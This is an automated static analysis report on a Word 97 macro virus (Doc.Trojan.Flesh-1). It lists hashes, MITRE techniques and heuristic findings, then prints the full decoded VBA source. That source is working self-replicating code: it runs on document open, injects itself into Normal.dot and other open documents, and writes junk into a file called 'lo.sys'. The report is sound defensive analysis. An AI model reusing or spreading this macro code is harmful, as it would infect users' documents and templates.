Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 06f5fed96a46196a…

MALICIOUS

Office (OLE)

Size: 41.0 KB
Created: 1998-11-02 17:57:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-26
MD5: 4dc59241cc63741d78d0fb66296e4980
SHA-1: 45c522b2bd65a9c7b3958b2f460c6e3aa3bab7a7
SHA-256: 06f5fed96a46196a2e6e2fb73fe5a0b46f991ed6a71e45464c41426ba3986ca9
Risk Score: 236

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The macros exhibit self-replication behavior, attempting to infect other documents and templates, as evidenced by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic and the script's logic. The 'Document_Open' subroutine initiates the infection process, and the script attempts to copy itself into the Normal.dot template, which is a common persistence mechanism.

Heuristics (6)

  • ClamAV: Doc.Trojan.Flesh-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Flesh-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
            If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12634 bytes
SHA-256: f4c461aecaafc88eec2c636a3abc807a1ddd2e2db51f81bb2e8bfa5127e7b68a
Detection
ClamAV: Doc.Trojan.Flesh-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
GoSub Flesh:
'macro code of user
'macro code of user
'macro code of user
'macro code of user
'THIS IS THE ORIGINAL VERSION OF THE PARASIT VIRUS OF LORD Arz
'let's have fun...
Flesh:
If Hook = 1 Then Exit Sub
Owner = ThisDocument.Name
If UCase(Owner) = "NORMAL.DOT" Then Ways = 1 Else Ways = 0
Select Case Ways
Case 0
    
    For c = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(c).CodeModule.Lines(2, 1) = "GoSub Flesh:" Then Set Carrier = ActiveDocument.VBProject.VBComponents(c).CodeModule
    Next c
    For i = 1 To Carrier.CountOfLines
        If Carrier.Lines(i, 1) = "Flesh:" Then
            For x = i To Carrier.CountOfLines - 1
                VC = VC & Carrier.Lines(x, 1) & Chr(13)
            Next x
            VC = Left(VC, Len(VC) - 1)
        i = x
        End If
    Next i
    
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        Set ToOwn = NormalTemplate.VBProject.VBComponents(i).CodeModule
        If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
        If ToOwn.Lines(2, 1) = "GoSub Flesh:" Then GoTo FAllDoneP
        For x = 1 To ToOwn.CountOfLines + 1
            If Left(ToOwn.Lines(x, 1), 3) = "Sub" Or Left(ToOwn.Lines(x, 1), 10) = "Private Sub" Then ToOwn.InsertLines x + 1, "Gosub Flesh:"
            If Left(ToOwn.Lines(x, 1), 7) = "End Sub" Then ToOwn.InsertLines x, VC
        Next x
FAllDoneP:
    Next i
GoTo DeadFlesh
Case 1
    
    For c = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(c).CodeModule.Lines(2, 1) = "GoSub Flesh:" Then Set Carrier = ActiveDocument.VBProject.VBComponents(c).CodeModule
    Next c
    For i = 1 To Carrier.CountOfLines
        If Carrier.Lines(i, 1) = "Flesh:" Then
            For x = i To Carrier.CountOfLines - 1
                VC = VC & Carrier.Lines(x, 1) & Chr(13)
            Next x
            VC = Left(VC, Len(VC) - 1)
        i = x
        End If
    Next i
    
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        Set ToOwn = ActiveDocument.VBProject.VBComponents(i).CodeModule
        If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
        If ToOwn.Lines(2, 1) = "GoSub Flesh:" Then GoTo PAllDoneF
        For x = 1 To ToOwn.CountOfLines + 1
            If Left(ToOwn.Lines(x, 1), 3) = "Sub" Or Left(ToOwn.Lines(x, 1), 10) = "Private Sub" Then ToOwn.InsertLines x + 1, "Gosub Flesh:"
            If Left(ToOwn.Lines(x, 1), 7) = "End Sub" Then ToOwn.InsertLines x, VC
        Next x
PAllDoneF:
    Next i
End Select
DeadFlesh:
EatUp = Int(Rnd * 50000000) + 10000000
Theef = Int(Rnd * 255)
Open "lo.sys" For Binary As #1
Put #1, EatUp, Theef
Close #1
Hook = 1
Return
End Sub

' Processing file: /opt/analyzer/scan_staging/57360337f4634796abcf405d46840611.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 15245 bytes